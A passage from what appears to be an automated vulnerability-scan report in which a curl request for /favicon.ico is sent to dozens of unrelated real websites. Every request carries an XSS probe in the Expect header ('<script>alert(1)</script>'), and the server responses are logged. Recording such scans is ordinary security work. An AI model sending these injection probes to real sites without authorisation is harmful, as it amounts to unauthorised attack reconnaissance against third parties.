Host: www.thetinytube.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.62
Date: Wed, 04 May 2011 01:50:14 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.62</center>
</body>
</html>

29.296. http://www.ticketseating.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ticketseating.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ticketseating.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:51:50 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.297. http://www.tiresontherun.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tiresontherun.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tiresontherun.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 01:44:04 GMT
Content-Type: text/html
Connection: keep-alive
Server: Apache/Nginx/Varnish
Last-Modified: Mon, 17 May 2010 19:11:59 GMT
ETag: "d2e29bc8-4e4-486ceffc79be2"
Vary: Accept-Encoding
Content-Length: 1252
Accept-Ranges: bytes
Age: 0

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

   <head>
    <title>404 Error - Page Not Found</title>
   </head>
   
   <body>
       <table style="border: 1px dashed rgb(204, 204, 204)
...[SNIP]...

29.298. http://www.toyotaopinion.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toyotaopinion.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.toyotaopinion.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 403 Forbidden
Content-Length: 323
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:46:04 GMT

<HTML>
   <HEAD>

   <script language="JavaScript">
   <!-- begin hide

   function goElseWhere()
   {
   var oldURL = window.location.hostname + window.location.pathname;
   var newURL = "https://" + oldU
...[SNIP]...

29.299. http://www.traffone.cn/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.traffone.cn
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.traffone.cn
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.5.33
Date: Wed, 04 May 2011 02:06:02 GMT
Content-Type: text/html
Content-Length: 65
Last-Modified: Tue, 27 Jul 2010 06:58:16 GMT
Connection: keep-alive
Accept-Ranges: bytes

<script>
location.href='http://'+window.location.host;
</script>

29.300. http://www.treetop.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.treetop.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.treetop.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 126
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:06:50 GMT

<html><head><meta HTTP-EQUIV=REFRESH content="0;url=http://treetop.com/consumersite/aboutus.aspx"/></head><body></body></html>

29.301. http://www.tripplite.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tripplite.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tripplite.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:28:41 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.302. http://www.tunewiki.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tunewiki.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tunewiki.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:11:08 GMT
Connection: close
Content-Length: 60
Set-Cookie: SERVERID=dayweb01; path=/

The page cannot be displayed because the expectation failed.

29.303. http://www.twiztv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.twiztv.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.twiztv.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Wed, 04 May 2011 04:08:03 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 463

<html><head><title>www.twiztv.com</title></head><frameset rows='100%, *' frameborder=no framespacing=0 border=0><frame src="http://dmca.free.fr/twiztv.html" name=mainwindow frameborder=no framespacing
...[SNIP]...

29.304. http://www.urheencorser.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.urheencorser.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.urheencorser.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.32
Date: Wed, 04 May 2011 01:15:09 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.6.32</center>
</body>
</html>

29.305. http://www.utne.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.utne.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.utne.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:05:33 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.306. http://www.uwgb.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uwgb.edu
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.uwgb.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:47:28 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.307. http://www.vagazette.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vagazette.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vagazette.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: WWW
Content-Type: text/html
Date: Wed, 04 May 2011 03:11:37 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: vagazette.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

29.308. http://www.vegasview.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vegasview.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vegasview.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: X-Mapping-bghfahco=8313510636CE875D636B546E4BA63827; path=/
Content-Length: 60
Date: Wed, 04 May 2011 00:47:34 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Type: text/html

The page cannot be displayed because the expectation failed.

29.309. http://www.vh1classic.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vh1classic.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vh1classic.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 504 Gateway Time-out
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 251
Cache-Control: max-age=1800
Expires: Wed, 04 May 2011 02:48:13 GMT
Date: Wed, 04 May 2011 02:18:13 GMT
Connection: close

<HTML><HEAD>
<TITLE>Gateway Timeout - In read </TITLE>
</HEAD><BODY>
<H1>Gateway Timeout</H1>
The proxy server did not receive a timely response from the upstream server.<P>
Reference&#32;&#35;1&#46;5
...[SNIP]...

29.310. http://www.viewmylisting.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.viewmylisting.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.viewmylisting.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:40:48 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.311. http://www.vintage-toys.biz/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vintage-toys.biz
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vintage-toys.biz
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>


29.312. http://www.wachoviadealer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wachoviadealer.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wachoviadealer.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
X-Powered-By: ASP.NET
Cache-Control: no-cache,no-transform
Expires: Wed, 04 May 2011 02:35:03 GMT
Vary: *
Date: Wed, 04 May 2011 02:35:03 GMT
Content-Type: text/html
Accept-Ranges: bytes
Content-Length: 2321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...

29.313. http://www.warehouseskateboards.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.warehouseskateboards.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.warehouseskateboards.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 5134
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:30:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<TITLE>Page Not Found! Warehouse Skateboards has moved that page.</TITLE>
<li
...[SNIP]...

29.314. http://www.wcvirtualversion.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wcvirtualversion.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wcvirtualversion.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.63
Date: Wed, 04 May 2011 02:24:58 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive
Vary: Accept-Encoding

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.63</center>
</body>
</html>

29.315. http://www.webcam-fun.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webcam-fun.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.webcam-fun.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:56:08 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.316. http://www.webgreeter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webgreeter.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.webgreeter.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:35:00 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.317. http://www.webindia123.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webindia123.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.webindia123.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 790
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSQSTQAAS=MHDNCNCAHEHJLOENBPEPLCED; path=/
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:17:15 GMT


<head>
<title>Page not Found</title>
</head>
<body topmargin="0" leftmargin="0">

<center>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<table border="0" cellpadding="0" cells
...[SNIP]...

29.318. http://www.wharfyouth.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wharfyouth.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wharfyouth.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 403 Forbidden
Date: Wed, 04 May 2011 04:00:55 GMT
Server: LiteSpeed
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Cache-Control: private, no-cache, max-age=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 380

<html>
<head><title> 403 Forbidden
</title></head>
<body><h1> 403 Forbidden
</h1>
Access to this resource on the server is denied!<hr />
Powered By <a href='http://www.litespeedtech.com'>LiteSpeed W
...[SNIP]...

29.319. http://www.wherethelocalseat.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wherethelocalseat.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wherethelocalseat.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: .ASPXANONYMOUS=qqqHu5dAzAEkAAAAMDAzNjI3YzYtYzEwYi00YTEyLWI4NzEtNDZkYjVlNDYyMjRi0MfJhH5wb3vYYSiD0z_8M-xEb3WvocFQ8HXYkLgBQpg1; expires=Tue, 12-Jul-2011 13:29:31 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:49:31 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.320. http://www.whosaliveandwhosdead.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whosaliveandwhosdead.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.whosaliveandwhosdead.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:28:40 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.321. http://www.winsornewton.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winsornewton.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.winsornewton.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Wed, 04 May 2011 01:02:17 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.322. http://www.winwithpaperless.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winwithpaperless.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.winwithpaperless.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server:
Date: Wed, 04 May 2011 01:28:15 GMT
Connection: close
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.323. http://www.wjr.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wjr.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wjr.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:41:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NON DSP COR OTPa OUR IND OTC"
Content-Length: 67
Content-Type: text/html
Set-Cookie: SiteUserIsBot=0; path=/
Set-Cookie: ASPSESSIONIDASDCDCAR=JNDFDIEANCFGNJKMGINNPCLG; path=/
Cache-control: private
Set-Cookie: NSC_xKS=ffffffff09021e1d45525d5f4f58455e445a4a422215;expires=Wed, 04-May-2011 02:14:51 GMT;path=/

<br>Error, file not found: 404;http://www.wjr.com:5157/favicon.ico

29.324. http://www.worden.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.worden.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.worden.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:57:27 GMT
Content-Length: 60
Set-Cookie: BIGipServerworden.com=2852784650.20480.0000; path=/

The page cannot be displayed because the expectation failed.

29.325. http://www.worldsoffun.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.worldsoffun.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.worldsoffun.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:24:23 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.326. http://www.wpr.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wpr.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wpr.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Wed, 04 May 2011 02:30:47 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.327. http://www.writeaprisoner.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.writeaprisoner.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.writeaprisoner.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:31:04 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.328. http://www.xftvgirls.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xftvgirls.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xftvgirls.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:18:50 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.329. http://www.xgalx.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xgalx.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xgalx.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.62
Date: Wed, 04 May 2011 04:14:43 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.62</center>
</body>
</html>

29.330. http://www.xignite.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xignite.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xignite.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:28:07 GMT
Connection: close
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.331. http://www.yapchat.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yapchat.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yapchat.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:44:54 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.332. http://www.yellowairplane.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yellowairplane.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yellowairplane.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 03:07:07 GMT
Content-Length: 4452
Content-Type: text/html
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Set-Cookie: BlueStripe.PVN=1e2000015d51; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Page Not Found</TITLE>
<style type="text/css">
<!--
h1 {
   font-family:Arial, Arial, Helvetica, sans-serif;
   font-size
...[SNIP]...

29.333. http://www.zgallerie.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zgallerie.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.zgallerie.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:12:06 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.334. http://www.zoneofhairy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zoneofhairy.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.zoneofhairy.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.46
Date: Tue, 03 May 2011 23:52:54 GMT
Content-Type: text/html
Content-Length: 169
